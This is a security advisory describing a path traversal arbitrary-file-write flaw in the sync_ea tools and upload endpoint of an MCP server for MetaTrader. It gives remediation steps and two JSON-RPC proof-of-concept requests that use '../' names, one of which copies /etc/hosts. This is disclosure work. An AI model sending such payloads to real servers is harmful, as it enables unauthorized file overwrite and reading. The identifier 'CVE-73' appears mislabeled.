# Vulnerability Summary: Arbitrary File Write Vulnerability in mcp-mt4-server ## 1. Vulnerability Overview * **Vulnerability Name**: Arbitrary File Write Vulnerability in mcp-mt4-server (CVE-73) * **Vulnerability Type**: External Control of File Name or Path (CWE-73) * **Affected Components**: `src/index.ts` and `windows-server/server.js` * **Vulnerability Description**: * In the `sync_ea` tool, the user-provided `ea_name` parameter is directly concatenated into a file system path without verifying whether the path resides within the expected `ea-strategies/active` directory. An attacker can exploit sequences such as `../` to create or overwrite malicious files at arbitrary locations. * In the `sync_ea_from_file` tool, an attacker can read any local file via the `file_path` parameter and write its content to an arbitrary location using the `ea_name` parameter. * In `windows-server/server.js`, the `POST /api/ea/upload` endpoint also receives an `ea_name` parameter that suffers from path traversal issues, leading to arbitrary file writes. ## 2. Impact Scope * **Affected Version**: 1.0.0 * **Security Impact**: * **Integrity (High)**: Attackers can create or overwrite any writable file. * **Availability (High)**: Overwriting application files, logs, or configuration can disrupt the MCP server. * **Confidentiality (Low-Medium)**: Can read any text file accessible to the server process. * **CVSS Score**: 8.1 (High) ## 3. Remediation Measures * **Input Validation**: Treat `ea_name` as an identifier rather than a path; reject path separators, absolute paths, Windows drive letters, etc. * **Path Normalization**: Use `path.resolve` to normalize paths and enforce that the target write location is within the intended base directory (e.g., `ea-strategies/active`). * **Permission Control**: Restrict MCP server access permissions, run under a low-privilege account, or execute within a sandbox/container. * **Code Fixes**: Apply the same normalization checks to `sync_ea`, `compile_ea`, `sync_ea_from_file`, and the HTTP upload interface. ## 4. Proof-of-Concept (POC) Code **Exploiting `sync_ea` for path traversal write:** ```json { "jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": { "name": "sync_ea", "arguments": { "ea_name": "../../mt4-mcp-poc", "ea_content": "// path traversal poc" } } } ``` **Exploiting `sync_ea_from_file` to read and write arbitrary file:** ```json { "jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": { "name": "sync_ea_from_file", "arguments": { "file_path": "/etc/hosts", "ea_name": "../../copied-hosts" } } } ```